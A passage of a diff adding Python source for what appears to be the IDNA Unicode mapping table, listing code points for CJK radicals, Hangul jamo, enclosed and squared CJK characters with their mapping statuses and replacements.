(0x2F17, 'M', '十'), + (0x2F18, 'M', '卜'), + (0x2F19, 'M', '卩'), + (0x2F1A, 'M', '厂'), + (0x2F1B, 'M', '厶'), + (0x2F1C, 'M', '又'), + (0x2F1D, 'M', '口'), + (0x2F1E, 'M', '囗'), + (0x2F1F, 'M', '土'), + (0x2F20, 'M', '士'), + (0x2F21, 'M', '夂'), + (0x2F22, 'M', '夊'), + (0x2F23, 'M', '夕'), + (0x2F24, 'M', '大'), + (0x2F25, 'M', '女'), + (0x2F26, 'M', '子'), + (0x2F27, 'M', '宀'), + (0x2F28, 'M', '寸'), + (0x2F29, 'M', '小'), + (0x2F2A, 'M', '尢'), + (0x2F2B, 'M', '尸'), + (0x2F2C, 'M', '屮'), + (0x2F2D, 'M', '山'), + (0x2F2E, 'M', '巛'), + (0x2F2F, 'M', '工'), + (0x2F30, 'M', '己'), + (0x2F31, 'M', '巾'), + (0x2F32, 'M', '干'), + (0x2F33, 'M', '幺'), + (0x2F34, 'M', '广'), + (0x2F35, 'M', '廴'), + (0x2F36, 'M', '廾'), + (0x2F37, 'M', '弋'), + (0x2F38, 'M', '弓'), + (0x2F39, 'M', '彐'), + (0x2F3A, 'M', '彡'), + (0x2F3B, 'M', '彳'), + (0x2F3C, 'M', '心'), + (0x2F3D, 'M', '戈'), + (0x2F3E, 'M', '戶'), + (0x2F3F, 'M', '手'), + (0x2F40, 'M', '支'), + (0x2F41, 'M', '攴'), + (0x2F42, 'M', '文'), + (0x2F43, 'M', '斗'), + (0x2F44, 'M', '斤'), + (0x2F45, 'M', '方'), + (0x2F46, 'M', '无'), + (0x2F47, 'M', '日'), + (0x2F48, 'M', '曰'), + (0x2F49, 'M', '月'), + (0x2F4A, 'M', '木'), + (0x2F4B, 'M', '欠'), + (0x2F4C, 'M', '止'), + (0x2F4D, 'M', '歹'), + (0x2F4E, 'M', '殳'), + (0x2F4F, 'M', '毋'), + (0x2F50, 'M', '比'), + (0x2F51, 'M', '毛'), + (0x2F52, 'M', '氏'), + (0x2F53, 'M', '气'), + (0x2F54, 'M', '水'), + (0x2F55, 'M', '火'), + (0x2F56, 'M', '爪'), + (0x2F57, 'M', '父'), + (0x2F58, 'M', '爻'), + (0x2F59, 'M', '爿'), + (0x2F5A, 'M', '片'), + (0x2F5B, 'M', '牙'), + (0x2F5C, 'M', '牛'), + (0x2F5D, 'M', '犬'), + (0x2F5E, 'M', '玄'), + (0x2F5F, 'M', '玉'), + (0x2F60, 'M', '瓜'), + (0x2F61, 'M', '瓦'), + (0x2F62, 'M', '甘'), + (0x2F63, 'M', '生'), + (0x2F64, 'M', '用'), + (0x2F65, 'M', '田'), + (0x2F66, 'M', '疋'), + (0x2F67, 'M', '疒'), + (0x2F68, 'M', '癶'), + (0x2F69, 'M', '白'), + (0x2F6A, 'M', '皮'), + (0x2F6B, 'M', '皿'), + (0x2F6C, 'M', '目'), + (0x2F6D, 'M', '矛'), + (0x2F6E, 'M', '矢'), + (0x2F6F, 'M', '石'), + (0x2F70, 'M', '示'), + (0x2F71, 'M', '禸'), + (0x2F72, 'M', '禾'), + (0x2F73, 'M', '穴'), + (0x2F74, 'M', '立'), + (0x2F75, 'M', '竹'), + (0x2F76, 'M', '米'), + (0x2F77, 'M', '糸'), + (0x2F78, 'M', '缶'), + (0x2F79, 'M', '网'), + ] + +def _seg_28() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F7A, 'M', '羊'), + (0x2F7B, 'M', '羽'), + (0x2F7C, 'M', '老'), + (0x2F7D, 'M', '而'), + (0x2F7E, 'M', '耒'), + (0x2F7F, 'M', '耳'), + (0x2F80, 'M', '聿'), + (0x2F81, 'M', '肉'), + (0x2F82, 'M', '臣'), + (0x2F83, 'M', '自'), + (0x2F84, 'M', '至'), + (0x2F85, 'M', '臼'), + (0x2F86, 'M', '舌'), + (0x2F87, 'M', '舛'), + (0x2F88, 'M', '舟'), + (0x2F89, 'M', '艮'), + (0x2F8A, 'M', '色'), + (0x2F8B, 'M', '艸'), + (0x2F8C, 'M', '虍'), + (0x2F8D, 'M', '虫'), + (0x2F8E, 'M', '血'), + (0x2F8F, 'M', '行'), 
+ (0x2F90, 'M', '衣'), + (0x2F91, 'M', '襾'), + (0x2F92, 'M', '見'), + (0x2F93, 'M', '角'), + (0x2F94, 'M', '言'), + (0x2F95, 'M', '谷'), + (0x2F96, 'M', '豆'), + (0x2F97, 'M', '豕'), + (0x2F98, 'M', '豸'), + (0x2F99, 'M', '貝'), + (0x2F9A, 'M', '赤'), + (0x2F9B, 'M', '走'), + (0x2F9C, 'M', '足'), + (0x2F9D, 'M', '身'), + (0x2F9E, 'M', '車'), + (0x2F9F, 'M', '辛'), + (0x2FA0, 'M', '辰'), + (0x2FA1, 'M', '辵'), + (0x2FA2, 'M', '邑'), + (0x2FA3, 'M', '酉'), + (0x2FA4, 'M', '釆'), + (0x2FA5, 'M', '里'), + (0x2FA6, 'M', '金'), + (0x2FA7, 'M', '長'), + (0x2FA8, 'M', '門'), + (0x2FA9, 'M', '阜'), + (0x2FAA, 'M', '隶'), + (0x2FAB, 'M', '隹'), + (0x2FAC, 'M', '雨'), + (0x2FAD, 'M', '靑'), + (0x2FAE, 'M', '非'), + (0x2FAF, 'M', '面'), + (0x2FB0, 'M', '革'), + (0x2FB1, 'M', '韋'), + (0x2FB2, 'M', '韭'), + (0x2FB3, 'M', '音'), + (0x2FB4, 'M', '頁'), + (0x2FB5, 'M', '風'), + (0x2FB6, 'M', '飛'), + (0x2FB7, 'M', '食'), + (0x2FB8, 'M', '首'), + (0x2FB9, 'M', '香'), + (0x2FBA, 'M', '馬'), + (0x2FBB, 'M', '骨'), + (0x2FBC, 'M', '高'), + (0x2FBD, 'M', '髟'), + (0x2FBE, 'M', '鬥'), + (0x2FBF, 'M', '鬯'), + (0x2FC0, 'M', '鬲'), + (0x2FC1, 'M', '鬼'), + (0x2FC2, 'M', '魚'), + (0x2FC3, 'M', '鳥'), + (0x2FC4, 'M', '鹵'), + (0x2FC5, 'M', '鹿'), + (0x2FC6, 'M', '麥'), + (0x2FC7, 'M', '麻'), + (0x2FC8, 'M', '黃'), + (0x2FC9, 'M', '黍'), + (0x2FCA, 'M', '黑'), + (0x2FCB, 'M', '黹'), + (0x2FCC, 'M', '黽'), + (0x2FCD, 'M', '鼎'), + (0x2FCE, 'M', '鼓'), + (0x2FCF, 'M', '鼠'), + (0x2FD0, 'M', '鼻'), + (0x2FD1, 'M', '齊'), + (0x2FD2, 'M', '齒'), + (0x2FD3, 'M', '龍'), + (0x2FD4, 'M', '龜'), + (0x2FD5, 'M', '龠'), + (0x2FD6, 'X'), + (0x3000, '3', ' '), + (0x3001, 'V'), + (0x3002, 'M', '.'), + (0x3003, 'V'), + (0x3036, 'M', '〒'), + (0x3037, 'V'), + (0x3038, 'M', '十'), + ] + +def _seg_29() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3039, 'M', '卄'), + (0x303A, 'M', '卅'), + (0x303B, 'V'), + (0x3040, 'X'), + (0x3041, 'V'), + (0x3097, 'X'), + (0x3099, 'V'), + (0x309B, '3', ' ゙'), + (0x309C, '3', ' ゚'), + (0x309D, 'V'), + (0x309F, 'M', 'より'), + (0x30A0, 'V'), + (0x30FF, 'M', 'コト'), + (0x3100, 'X'), + (0x3105, 'V'), + (0x3130, 'X'), + (0x3131, 'M', 'ᄀ'), + (0x3132, 'M', 'ᄁ'), + (0x3133, 'M', 'ᆪ'), + (0x3134, 'M', 'ᄂ'), + (0x3135, 'M', 'ᆬ'), + (0x3136, 'M', 'ᆭ'), + (0x3137, 'M', 'ᄃ'), + (0x3138, 'M', 'ᄄ'), + (0x3139, 'M', 'ᄅ'), + (0x313A, 'M', 'ᆰ'), + (0x313B, 'M', 'ᆱ'), + (0x313C, 'M', 'ᆲ'), + (0x313D, 'M', 'ᆳ'), + (0x313E, 'M', 'ᆴ'), + (0x313F, 'M', 'ᆵ'), + (0x3140, 'M', 'ᄚ'), + (0x3141, 'M', 'ᄆ'), + (0x3142, 'M', 'ᄇ'), + (0x3143, 'M', 'ᄈ'), + (0x3144, 'M', 'ᄡ'), + (0x3145, 'M', 'ᄉ'), + (0x3146, 'M', 'ᄊ'), + (0x3147, 'M', 'ᄋ'), + (0x3148, 'M', 'ᄌ'), + (0x3149, 'M', 'ᄍ'), + (0x314A, 'M', 'ᄎ'), + (0x314B, 'M', 'ᄏ'), + (0x314C, 'M', 'ᄐ'), + (0x314D, 'M', 'ᄑ'), + (0x314E, 'M', 'ᄒ'), + (0x314F, 'M', 'ᅡ'), + (0x3150, 'M', 'ᅢ'), + (0x3151, 'M', 'ᅣ'), + (0x3152, 'M', 'ᅤ'), + (0x3153, 'M', 'ᅥ'), + (0x3154, 'M', 'ᅦ'), + (0x3155, 'M', 'ᅧ'), + (0x3156, 'M', 'ᅨ'), + (0x3157, 'M', 'ᅩ'), + (0x3158, 'M', 'ᅪ'), + (0x3159, 'M', 'ᅫ'), + (0x315A, 'M', 'ᅬ'), + (0x315B, 'M', 'ᅭ'), + (0x315C, 'M', 'ᅮ'), + (0x315D, 'M', 'ᅯ'), + (0x315E, 'M', 'ᅰ'), + (0x315F, 'M', 'ᅱ'), + (0x3160, 'M', 'ᅲ'), + (0x3161, 'M', 'ᅳ'), + (0x3162, 'M', 'ᅴ'), + (0x3163, 'M', 'ᅵ'), + (0x3164, 'X'), + (0x3165, 'M', 'ᄔ'), + (0x3166, 'M', 'ᄕ'), + (0x3167, 'M', 'ᇇ'), + (0x3168, 'M', 'ᇈ'), + (0x3169, 'M', 'ᇌ'), + (0x316A, 'M', 'ᇎ'), + (0x316B, 'M', 'ᇓ'), + (0x316C, 'M', 'ᇗ'), + (0x316D, 'M', 'ᇙ'), + (0x316E, 'M', 'ᄜ'), + (0x316F, 'M', 'ᇝ'), + (0x3170, 'M', 'ᇟ'), + (0x3171, 'M', 'ᄝ'), + (0x3172, 'M', 'ᄞ'), + (0x3173, 'M', 
'ᄠ'), + (0x3174, 'M', 'ᄢ'), + (0x3175, 'M', 'ᄣ'), + (0x3176, 'M', 'ᄧ'), + (0x3177, 'M', 'ᄩ'), + (0x3178, 'M', 'ᄫ'), + (0x3179, 'M', 'ᄬ'), + (0x317A, 'M', 'ᄭ'), + (0x317B, 'M', 'ᄮ'), + (0x317C, 'M', 'ᄯ'), + (0x317D, 'M', 'ᄲ'), + (0x317E, 'M', 'ᄶ'), + (0x317F, 'M', 'ᅀ'), + (0x3180, 'M', 'ᅇ'), + (0x3181, 'M', 'ᅌ'), + (0x3182, 'M', 'ᇱ'), + (0x3183, 'M', 'ᇲ'), + (0x3184, 'M', 'ᅗ'), + ] + +def _seg_30() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3185, 'M', 'ᅘ'), + (0x3186, 'M', 'ᅙ'), + (0x3187, 'M', 'ᆄ'), + (0x3188, 'M', 'ᆅ'), + (0x3189, 'M', 'ᆈ'), + (0x318A, 'M', 'ᆑ'), + (0x318B, 'M', 'ᆒ'), + (0x318C, 'M', 'ᆔ'), + (0x318D, 'M', 'ᆞ'), + (0x318E, 'M', 'ᆡ'), + (0x318F, 'X'), + (0x3190, 'V'), + (0x3192, 'M', '一'), + (0x3193, 'M', '二'), + (0x3194, 'M', '三'), + (0x3195, 'M', '四'), + (0x3196, 'M', '上'), + (0x3197, 'M', '中'), + (0x3198, 'M', '下'), + (0x3199, 'M', '甲'), + (0x319A, 'M', '乙'), + (0x319B, 'M', '丙'), + (0x319C, 'M', '丁'), + (0x319D, 'M', '天'), + (0x319E, 'M', '地'), + (0x319F, 'M', '人'), + (0x31A0, 'V'), + (0x31E4, 'X'), + (0x31F0, 'V'), + (0x3200, '3', '(ᄀ)'), + (0x3201, '3', '(ᄂ)'), + (0x3202, '3', '(ᄃ)'), + (0x3203, '3', '(ᄅ)'), + (0x3204, '3', '(ᄆ)'), + (0x3205, '3', '(ᄇ)'), + (0x3206, '3', '(ᄉ)'), + (0x3207, '3', '(ᄋ)'), + (0x3208, '3', '(ᄌ)'), + (0x3209, '3', '(ᄎ)'), + (0x320A, '3', '(ᄏ)'), + (0x320B, '3', '(ᄐ)'), + (0x320C, '3', '(ᄑ)'), + (0x320D, '3', '(ᄒ)'), + (0x320E, '3', '(가)'), + (0x320F, '3', '(나)'), + (0x3210, '3', '(다)'), + (0x3211, '3', '(라)'), + (0x3212, '3', '(마)'), + (0x3213, '3', '(바)'), + (0x3214, '3', '(사)'), + (0x3215, '3', '(아)'), + (0x3216, '3', '(자)'), + (0x3217, '3', '(차)'), + (0x3218, '3', '(카)'), + (0x3219, '3', '(타)'), + (0x321A, '3', '(파)'), + (0x321B, '3', '(하)'), + (0x321C, '3', '(주)'), + (0x321D, '3', '(오전)'), + (0x321E, '3', '(오후)'), + (0x321F, 'X'), + (0x3220, '3', '(一)'), + (0x3221, '3', '(二)'), + (0x3222, '3', '(三)'), + (0x3223, '3', '(四)'), + (0x3224, '3', '(五)'), + (0x3225, '3', '(六)'), + (0x3226, '3', '(七)'), + (0x3227, '3', '(八)'), + (0x3228, '3', '(九)'), + (0x3229, '3', '(十)'), + (0x322A, '3', '(月)'), + (0x322B, '3', '(火)'), + (0x322C, '3', '(水)'), + (0x322D, '3', '(木)'), + (0x322E, '3', '(金)'), + (0x322F, '3', '(土)'), + (0x3230, '3', '(日)'), + (0x3231, '3', '(株)'), + (0x3232, '3', '(有)'), + (0x3233, '3', '(社)'), + (0x3234, '3', '(名)'), + (0x3235, '3', '(特)'), + (0x3236, '3', '(財)'), + (0x3237, '3', '(祝)'), + (0x3238, '3', '(労)'), + (0x3239, '3', '(代)'), + (0x323A, '3', '(呼)'), + (0x323B, '3', '(学)'), + (0x323C, '3', '(監)'), + (0x323D, '3', '(企)'), + (0x323E, '3', '(資)'), + (0x323F, '3', '(協)'), + (0x3240, '3', '(祭)'), + (0x3241, '3', '(休)'), + (0x3242, '3', '(自)'), + (0x3243, '3', '(至)'), + (0x3244, 'M', '問'), + (0x3245, 'M', '幼'), + (0x3246, 'M', '文'), + ] + +def _seg_31() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3247, 'M', '箏'), + (0x3248, 'V'), + (0x3250, 'M', 'pte'), + (0x3251, 'M', '21'), + (0x3252, 'M', '22'), + (0x3253, 'M', '23'), + (0x3254, 'M', '24'), + (0x3255, 'M', '25'), + (0x3256, 'M', '26'), + (0x3257, 'M', '27'), + (0x3258, 'M', '28'), + (0x3259, 'M', '29'), + (0x325A, 'M', '30'), + (0x325B, 'M', '31'), + (0x325C, 'M', '32'), + (0x325D, 'M', '33'), + (0x325E, 'M', '34'), + (0x325F, 'M', '35'), + (0x3260, 'M', 'ᄀ'), + (0x3261, 'M', 'ᄂ'), + (0x3262, 'M', 'ᄃ'), + (0x3263, 'M', 'ᄅ'), + (0x3264, 'M', 'ᄆ'), + (0x3265, 'M', 'ᄇ'), + (0x3266, 'M', 'ᄉ'), + (0x3267, 'M', 'ᄋ'), + (0x3268, 'M', 'ᄌ'), + (0x3269, 'M', 'ᄎ'), + (0x326A, 'M', 'ᄏ'), + (0x326B, 'M', 'ᄐ'), + (0x326C, 'M', 'ᄑ'), 
+ (0x326D, 'M', 'ᄒ'), + (0x326E, 'M', '가'), + (0x326F, 'M', '나'), + (0x3270, 'M', '다'), + (0x3271, 'M', '라'), + (0x3272, 'M', '마'), + (0x3273, 'M', '바'), + (0x3274, 'M', '사'), + (0x3275, 'M', '아'), + (0x3276, 'M', '자'), + (0x3277, 'M', '차'), + (0x3278, 'M', '카'), + (0x3279, 'M', '타'), + (0x327A, 'M', '파'), + (0x327B, 'M', '하'), + (0x327C, 'M', '참고'), + (0x327D, 'M', '주의'), + (0x327E, 'M', '우'), + (0x327F, 'V'), + (0x3280, 'M', '一'), + (0x3281, 'M', '二'), + (0x3282, 'M', '三'), + (0x3283, 'M', '四'), + (0x3284, 'M', '五'), + (0x3285, 'M', '六'), + (0x3286, 'M', '七'), + (0x3287, 'M', '八'), + (0x3288, 'M', '九'), + (0x3289, 'M', '十'), + (0x328A, 'M', '月'), + (0x328B, 'M', '火'), + (0x328C, 'M', '水'), + (0x328D, 'M', '木'), + (0x328E, 'M', '金'), + (0x328F, 'M', '土'), + (0x3290, 'M', '日'), + (0x3291, 'M', '株'), + (0x3292, 'M', '有'), + (0x3293, 'M', '社'), + (0x3294, 'M', '名'), + (0x3295, 'M', '特'), + (0x3296, 'M', '財'), + (0x3297, 'M', '祝'), + (0x3298, 'M', '労'), + (0x3299, 'M', '秘'), + (0x329A, 'M', '男'), + (0x329B, 'M', '女'), + (0x329C, 'M', '適'), + (0x329D, 'M', '優'), + (0x329E, 'M', '印'), + (0x329F, 'M', '注'), + (0x32A0, 'M', '項'), + (0x32A1, 'M', '休'), + (0x32A2, 'M', '写'), + (0x32A3, 'M', '正'), + (0x32A4, 'M', '上'), + (0x32A5, 'M', '中'), + (0x32A6, 'M', '下'), + (0x32A7, 'M', '左'), + (0x32A8, 'M', '右'), + (0x32A9, 'M', '医'), + (0x32AA, 'M', '宗'), + (0x32AB, 'M', '学'), + (0x32AC, 'M', '監'), + (0x32AD, 'M', '企'), + (0x32AE, 'M', '資'), + (0x32AF, 'M', '協'), + (0x32B0, 'M', '夜'), + (0x32B1, 'M', '36'), + ] + +def _seg_32() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x32B2, 'M', '37'), + (0x32B3, 'M', '38'), + (0x32B4, 'M', '39'), + (0x32B5, 'M', '40'), + (0x32B6, 'M', '41'), + (0x32B7, 'M', '42'), + (0x32B8, 'M', '43'), + (0x32B9, 'M', '44'), + (0x32BA, 'M', '45'), + (0x32BB, 'M', '46'), + (0x32BC, 'M', '47'), + (0x32BD, 'M', '48'), + (0x32BE, 'M', '49'), + (0x32BF, 'M', '50'), + (0x32C0, 'M', '1月'), + (0x32C1, 'M', '2月'), + (0x32C2, 'M', '3月'), + (0x32C3, 'M', '4月'), + (0x32C4, 'M', '5月'), + (0x32C5, 'M', '6月'), + (0x32C6, 'M', '7月'), + (0x32C7, 'M', '8月'), + (0x32C8, 'M', '9月'), + (0x32C9, 'M', '10月'), + (0x32CA, 'M', '11月'), + (0x32CB, 'M', '12月'), + (0x32CC, 'M', 'hg'), + (0x32CD, 'M', 'erg'), + (0x32CE, 'M', 'ev'), + (0x32CF, 'M', 'ltd'), + (0x32D0, 'M', 'ア'), + (0x32D1, 'M', 'イ'), + (0x32D2, 'M', 'ウ'), + (0x32D3, 'M', 'エ'), + (0x32D4, 'M', 'オ'), + (0x32D5, 'M', 'カ'), + (0x32D6, 'M', 'キ'), + (0x32D7, 'M', 'ク'), + (0x32D8, 'M', 'ケ'), + (0x32D9, 'M', 'コ'), + (0x32DA, 'M', 'サ'), + (0x32DB, 'M', 'シ'), + (0x32DC, 'M', 'ス'), + (0x32DD, 'M', 'セ'), + (0x32DE, 'M', 'ソ'), + (0x32DF, 'M', 'タ'), + (0x32E0, 'M', 'チ'), + (0x32E1, 'M', 'ツ'), + (0x32E2, 'M', 'テ'), + (0x32E3, 'M', 'ト'), + (0x32E4, 'M', 'ナ'), + (0x32E5, 'M', 'ニ'), + (0x32E6, 'M', 'ヌ'), + (0x32E7, 'M', 'ネ'), + (0x32E8, 'M', 'ノ'), + (0x32E9, 'M', 'ハ'), + (0x32EA, 'M', 'ヒ'), + (0x32EB, 'M', 'フ'), + (0x32EC, 'M', 'ヘ'), + (0x32ED, 'M', 'ホ'), + (0x32EE, 'M', 'マ'), + (0x32EF, 'M', 'ミ'), + (0x32F0, 'M', 'ム'), + (0x32F1, 'M', 'メ'), + (0x32F2, 'M', 'モ'), + (0x32F3, 'M', 'ヤ'), + (0x32F4, 'M', 'ユ'), + (0x32F5, 'M', 'ヨ'), + (0x32F6, 'M', 'ラ'), + (0x32F7, 'M', 'リ'), + (0x32F8, 'M', 'ル'), + (0x32F9, 'M', 'レ'), + (0x32FA, 'M', 'ロ'), + (0x32FB, 'M', 'ワ'), + (0x32FC, 'M', 'ヰ'), + (0x32FD, 'M', 'ヱ'), + (0x32FE, 'M', 'ヲ'), + (0x32FF, 'M', '令和'), + (0x3300, 'M', 'アパート'), + (0x3301, 'M', 'アルファ'), + (0x3302, 'M', 'アンペア'), + (0x3303, 'M', 'アール'), + (0x3304, 'M', 'イニング'), + (0x3305, 'M', 'インチ'), + (0x3306, 'M', 'ウォン'), + (0x3307, 'M', 'エスクード'), + 
(0x3308, 'M', 'エーカー'), + (0x3309, 'M', 'オンス'), + (0x330A, 'M', 'オーム'), + (0x330B, 'M', 'カイリ'), + (0x330C, 'M', 'カラット'), + (0x330D, 'M', 'カロリー'), + (0x330E, 'M', 'ガロン'), + (0x330F, 'M', 'ガンマ'), + (0x3310, 'M', 'ギガ'), + (0x3311, 'M', 'ギニー'), + (0x3312, 'M', 'キュリー'), + (0x3313, 'M', 'ギルダー'), + (0x3314, 'M', 'キロ'), + (0x3315, 'M', 'キログラム'), + ] + +def _seg_33() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x3316, 'M', 'キロメートル'), + (0x3317, 'M', 'キロワット'), + (0x3318, 'M', 'グラム'), + (0x3319, 'M', 'グラムトン'), + (0x331A, 'M', 'クルゼイロ'), + (0x331B, 'M', 'クローネ'), + (0x331C, 'M', 'ケース'), + (0x331D, 'M', 'コルナ'), + (0x331E, 'M', 'コーポ'), + (0x331F, 'M', 'サイクル'), + (0x3320, 'M', 'サンチーム'), + (0x3321, 'M', 'シリング'), + (0x3322, 'M', 'センチ'), + (0x3323, 'M', 'セント'), + (0x3324, 'M', 'ダース'), + (0x3325, 'M', 'デシ'), + (0x3326, 'M', 'ドル'), + (0x3327, 'M', 'トン'), + (0x3328, 'M', 'ナノ'), + (0x3329, 'M', 'ノット'), + (0x332A, 'M', 'ハイツ'), + (0x332B, 'M', 'パーセント'), + (0x332C, 'M', 'パーツ'), + (0x332D, 'M', 'バーレル'), + (0x332E, 'M', 'ピアストル'), + (0x332F, 'M', 'ピクル'), + (0x3330, 'M', 'ピコ'), + (0x3331, 'M', 'ビル'), + (0x3332, 'M', 'ファラッド'), + (0x3333, 'M', 'フィート'), + (0x3334, 'M', 'ブッシェル'), + (0x3335, 'M', 'フラン'), + (0x3336, 'M', 'ヘクタール'), + (0x3337, 'M', 'ペソ'), + (0x3338, 'M', 'ペニヒ'), + (0x3339, 'M', 'ヘルツ'), + (0x333A, 'M', 'ペンス'), + (0x333B, 'M', 'ページ'), + (0x333C, 'M', 'ベータ'), + (0x333D, 'M', 'ポイント'), + (0x333E, 'M', 'ボルト'), + (0x333F, 'M', 'ホン'), + (0x3340, 'M', 'ポンド'), + (0x3341, 'M', 'ホール'), + (0x3342, 'M', 'ホーン'), + (0x3343, 'M', 'マイクロ'), + (0x3344, 'M', 'マイル'), + (0x3345, 'M', 'マッハ'), + (0x3346, 'M', 'マルク'), + (0x3347, 'M', 'マンション'), + (0x3348, 'M', 'ミクロン'), + (0x3349, 'M', 'ミリ'), + (0x334A, 'M', 'ミリバール'), + (0x334B, 'M', 'メガ'), + (0x334C, 'M', 'メガトン'), + (0x334D, 'M', 'メートル'), + (0x334E, 'M', 'ヤード'), + (0x334F, 'M', 'ヤール'), + (0x3350, 'M', 'ユアン'), + (0x3351, 'M', 'リットル'), + (0x3352, 'M', 'リラ'), + (0x3353, 'M', 'ルピー'), + (0x3354, 'M', 'ルーブル'), + (0x3355, 'M', 'レム'), + (0x3356, 'M', 'レントゲン'), + (0x3357, 'M', 'ワット'), + (0x3358, 'M', '0点'), + (0x3359, 'M', '1点'), + (0x335A, 'M', '2点'), + (0x335B, 'M', '3点'), + (0x335C, 'M', '4点'), + (0x335D, 'M', '5点'), + (0x335E, 'M', '6点'), + (0x335F, 'M', '7点'), + (0x3360, 'M', '8点'), + (0x3361, 'M', '9点'), + (0x3362, 'M', '10点'), + (0x3363, 'M', '11点'), + (0x3364, 'M', '12点'), + (0x3365, 'M', '13点'), + (0x3366, 'M', '14点'), + (0x3367, 'M', '15点'), + (0x3368, 'M', '16点'), + (0x3369, 'M', '17点'), + (0x336A, 'M', '18点'), + (0x336B, 'M', '19点'), + (0x336C, 'M', '20点'), + (0x336D, 'M', '21点'), + (0x336E, 'M', '22点'), + (0x336F, 'M', '23点'), + (0x3370, 'M', '24点'), + (0x3371, 'M', 'hpa'), + (0x3372, 'M', 'da'), + (0x3373, 'M', 'au'), + (0x3374, 'M', 'bar'), + (0x3375, 'M', 'ov'), + (0x3376, 'M', 'pc'), + (0x3377, 'M', 'dm'), + (0x3378, 'M', 'dm2'), + (0x3379, 'M', 'dm3'), + ] + +def _seg_34() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x337A, 'M', 'iu'), + (0x337B, 'M', '平成'), + (0x337C, 'M', '昭和'), + (0x337D, 'M', '大正'), + (0x337E, 'M', '明治'), + (0x337F, 'M', '株式会社'), + (0x3380, 'M', 'pa'), + (0x3381, 'M', 'na'), + (0x3382, 'M', 'μa'), + (0x3383, 'M', 'ma'), + (0x3384, 'M', 'ka'), + (0x3385, 'M', 'kb'), + (0x3386, 'M', 'mb'), + (0x3387, 'M', 'gb'), + (0x3388, 'M', 'cal'), + (0x3389, 'M', 'kcal'), + (0x338A, 'M', 'pf'), + (0x338B, 'M', 'nf'), + (0x338C, 'M', 'μf'), + (0x338D, 'M', 'μg'), + (0x338E, 'M', 'mg'), + (0x338F, 'M', 'kg'), + (0x3390, 'M', 'hz'), + (0x3391, 'M', 'khz'), + (0x3392, 'M', 'mhz'), + (0x3393, 'M', 'ghz'), + (0x3394, 'M', 'thz'), 
+ (0x3395, 'M', 'μl'), + (0x3396, 'M', 'ml'), + (0x3397, 'M', 'dl'), + (0x3398, 'M', 'kl'), + (0x3399, 'M', 'fm'), + (0x339A, 'M', 'nm'), + (0x339B, 'M', 'μm'), + (0x339C, 'M', 'mm'), + (0x339D, 'M', 'cm'), + (0x339E, 'M', 'km'), + (0x339F, 'M', 'mm2'), + (0x33A0, 'M', 'cm2'), + (0x33A1, 'M', 'm2'), + (0x33A2, 'M', 'km2'), + (0x33A3, 'M', 'mm3'), + (0x33A4, 'M', 'cm3'), + (0x33A5, 'M', 'm3'), + (0x33A6, 'M', 'km3'), + (0x33A7, 'M', 'm∕s'), + (0x33A8, 'M', 'm∕s2'), + (0x33A9, 'M', 'pa'), + (0x33AA, 'M', 'kpa'), + (0x33AB, 'M', 'mpa'), + (0x33AC, 'M', 'gpa'), + (0x33AD, 'M', 'rad'), + (0x33AE, 'M', 'rad∕s'), + (0x33AF, 'M', 'rad∕s2'), + (0x33B0, 'M', 'ps'), + (0x33B1, 'M', 'ns'), + (0x33B2, 'M', 'μs'), + (0x33B3, 'M', 'ms'), + (0x33B4, 'M', 'pv'), + (0x33B5, 'M', 'nv'), + (0x33B6, 'M', 'μv'), + (0x33B7, 'M', 'mv'), + (0x33B8, 'M', 'kv'), + (0x33B9, 'M', 'mv'), + (0x33BA, 'M', 'pw'), + (0x33BB, 'M', 'nw'), + (0x33BC, 'M', 'μw'), + (0x33BD, 'M', 'mw'), + (0x33BE, 'M', 'kw'), + (0x33BF, 'M', 'mw'), + (0x33C0, 'M', 'kω'), + (0x33C1, 'M', 'mω'), + (0x33C2, 'X'), + (0x33C3, 'M', 'bq'), + (0x33C4, 'M', 'cc'), + (0x33C5, 'M', 'cd'), + (0x33C6, 'M', 'c∕kg'), + (0x33C7, 'X'), + (0x33C8, 'M', 'db'), + (0x33C9, 'M', 'gy'), + (0x33CA, 'M', 'ha'), + (0x33CB, 'M', 'hp'), + (0x33CC, 'M', 'in'), + (0x33CD, 'M', 'kk'), + (0x33CE, 'M', 'km'), + (0x33CF, 'M', 'kt'), + (0x33D0, 'M', 'lm'), + (0x33D1, 'M', 'ln'), + (0x33D2, 'M', 'log'), + (0x33D3, 'M', 'lx'), + (0x33D4, 'M', 'mb'), + (0x33D5, 'M', 'mil'), + (0x33D6, 'M', 'mol'), + (0x33D7, 'M', 'ph'), + (0x33D8, 'X'), + (0x33D9, 'M', 'ppm'), + (0x33DA, 'M', 'pr'), + (0x33DB, 'M', 'sr'), + (0x33DC, 'M', 'sv'), + (0x33DD, 'M', 'wb'), + ] + +def _seg_35() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x33DE, 'M', 'v∕m'), + (0x33DF, 'M', 'a∕m'), + (0x33E0, 'M', '1日'), + (0x33E1, 'M', '2日'), + (0x33E2, 'M', '3日'), + (0x33E3, 'M', '4日'), + (0x33E4, 'M', '5日'), + (0x33E5, 'M', '6日'), + (0x33E6, 'M', '7日'), + (0x33E7, 'M', '8日'), + (0x33E8, 'M', '9日'), + (0x33E9, 'M', '10日'), + (0x33EA, 'M', '11日'), + (0x33EB, 'M', '12日'), + (0x33EC, 'M', '13日'), + (0x33ED, 'M', '14日'), + (0x33EE, 'M', '15日'), + (0x33EF, 'M', '16日'), + (0x33F0, 'M', '17日'), + (0x33F1, 'M', '18日'), + (0x33F2, 'M', '19日'), + (0x33F3, 'M', '20日'), + (0x33F4, 'M', '21日'), + (0x33F5, 'M', '22日'), + (0x33F6, 'M', '23日'), + (0x33F7, 'M', '24日'), + (0x33F8, 'M', '25日'), + (0x33F9, 'M', '26日'), + (0x33FA, 'M', '27日'), + (0x33FB, 'M', '28日'), + (0x33FC, 'M', '29日'), + (0x33FD, 'M', '30日'), + (0x33FE, 'M', '31日'), + (0x33FF, 'M', 'gal'), + (0x3400, 'V'), + (0xA48D, 'X'), + (0xA490, 'V'), + (0xA4C7, 'X'), + (0xA4D0, 'V'), + (0xA62C, 'X'), + (0xA640, 'M', 'ꙁ'), + 